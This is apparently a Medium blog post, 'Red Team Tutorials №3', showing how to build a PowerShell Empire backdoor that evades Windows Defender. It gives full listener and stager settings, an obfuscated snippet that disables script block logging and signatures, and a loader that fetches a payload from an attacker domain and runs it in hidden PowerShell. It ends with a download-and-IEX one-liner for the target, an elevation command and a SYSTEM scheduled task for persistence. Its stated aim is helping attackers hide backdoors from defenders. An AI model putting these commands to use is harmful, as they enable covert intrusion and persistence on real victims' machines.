RED TEAM TUTORIALS — №3

Bypassing Windows Defender — Empire edition

Photo by Markus Winkler via Unsplash.com

TOPICS

  1. Empire setup
  2. Magic to avoid detection
  3. Go go go!

Bypassing Windows Defender

Last month, I wrote two articles about the proper use of SSL with Powershell Empire and SSL with Meterpreter. That alone (and some other magic) let us bypass most of the Antivirus products. However, since a few weeks, Windows Defender seems to have gotten a lot smarter and is be able to detect these techniques. This tutorial will guide you in creating a working Empire backdoor without being detected by Windows Defender. For the same guide written for Meterpreter, check out Red Team Tutorials №4.

1. Empire setup

Below, you’ll see me use SSL options that may require some explaining. For the explanation, please read Red Team Tutorials №1 and Red Team Tutorials №2 mentioned in the previous paragraph.

Boot up Powershell Empire! And execute the following to get a basic payload which we will modify in a bit.

listeners
uselistener http
set Name https
set Host https://YOURDOMAINHERE:443
set Port 443
set Launcher powershell.exe -nop -w hidden -e
set DefaultProfile /wp_includes/microsoft.php|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36|Accept:*/*
set CertPath /opt/ssl/
set Headers Server:nginx
set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
execute

After that, set up the stager:

listeners
usestager multi/launcher
set Listener https
set Base64 False
set Obfuscate False
set SafeChecks False
set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
set AMSIBypass True
execute

This will give you a payload (which we will edit in the next step) looking like this:

2. Magic to avoid detection

The payload you end up with in the previous step is a so called one-liner.

Later on, after fetching the payload on our target, our loader will forward it line by line to a hidden powershell instance so we have to make some modifications first. Now, this is important so pay attention:

Antivirus software detect backdoors by using artificial intelligence, behavior analysis and matching (parts of) code to signatures. These signatures contain keywords and if (a combination of) keywords occur in a file saved to disk or in a running program, the Antivirus software will alert the user and try to remove the evil file or program. Almost all Antivirus software will detect and counter the payload above because it is all contained in one line (or in one file if you would save and run it). A combination of, for example, the words [SYsTem.NeT.WEbREquest] and [SYStem.TEXt.ENcOdiNg] might let the AV know that this is an Empire backdoor.

The trick here is to execute every line one by one for which we need to adjust the payload a bit. For this, I am using my favorite text editor Sublime Text. For each ; in the payload, I replace it with ; + a line break. Now, the payload will look like this:

Almost there

This modified payload will still trigger Windows Defender. The last part that needs changing is removing a part of the payload (in the example above, line 72 to part of line 77):

IF($ffF6){$b9be=$fff6.GETVaLUE($nulL);
IF($b9BE['ScriptB'+'lockLogging']){$b9be['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
$b9BE['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[COllectiONs.GeneriC.DIcTIonARY[StriNg,SysTem.OBJecT]]::New();
$VaL.ADd('EnableScriptB'+'lockLogging',0);
$VAL.AdD('EnableScriptBlockInvocationLogging',0);
$B9Be['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$vaL}ElsE{[ScRiPTBLOcK]."GeTFIe`lD"('signatures','N'+'onPublic,Static').SEtVALUE($Null,(NEw-ObjEct COLLeCTIoNS.GeNERIc.HaShSET[strInG]))}

The end result:

Save this file as payload.ps1 and serve the payload file using a web server such as Apache, nginx or the http.server module of python.

3. Go go go!

Okay. Empire is running and you have your payload at the ready. The only thing left is to create a tiny Powershell script that will fetch the payload and execute it line by line. This step is important as the one-liner we will use in the final step is to fetch and execute this ‘loader’ in memory.

Create a new file next to the payload called loader.ps1 with the following contents:

$file = (New-Object System.Net.WebClient).downloadString('http://YOURDOMAINHERE/payload.ps1')
foreach($line in $file)
{
$line | powershell -nop -w hidden
}

The only thing left is to execute a one-liner on the target!

powershell.exe -nop -w hidden (New-Object System.Net.WebClient).downloadString('http://YOURDOMAINHERE/loader.ps1') | IEX

That’s it! This should have evaded Windows Defender and most antivirus software. Good job!

EXTRA 1: ELEVATION

If the target user is local admin, open an elevated powershell like this (if you have no GUI):

start-process PowerShell -verb runas -ArgumentList "-nop -w hidden (New-Object System.Net.WebClient).downloadString('http://YOURDOMAINHERE/loader.ps1') | IEX"

EXTRA 2: SCHEDULED TASK

  1. Open Task Scheduler
  2. Create Basic Task
  3. Action: Start a program
  4. Type powershell.exe
  5. Add argument:
-nop -w hidden (New-Object System.Net.WebClient).downloadString('http://YOURDOMAINHERE/loader.ps1') | IEX

Customize the task by adding your own triggers, but don’t forget to change the user to SYSTEM (if you have permissions to do that).

RED TEAM TUTORIALS

With the ongoing shift from Red Teaming to Purple Teaming, Hunters (or: Blue Teamers) are becoming smarter in spotting and countering attacks from Hackers. The reason? Hackers and Hunters are finally learning from each other.

This tutorial is one of a few, written for Hackers to better hide your backdoors from Hunters. Check out my Medium page for more Red Team tutorials.

--

--

--

Founder // Hacker @ Chapter8.com

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Crypt0jan

Crypt0jan

Founder // Hacker @ Chapter8.com

More from Medium

How Attackers Are Using Common Vulnerabilities to Distribute Ransomware

Advent of Cyber 2021 — [Day 9] Where Is All This Data Going

On Cyber-security

Celebrate Diversity & File Inclusion: Hacking Splunk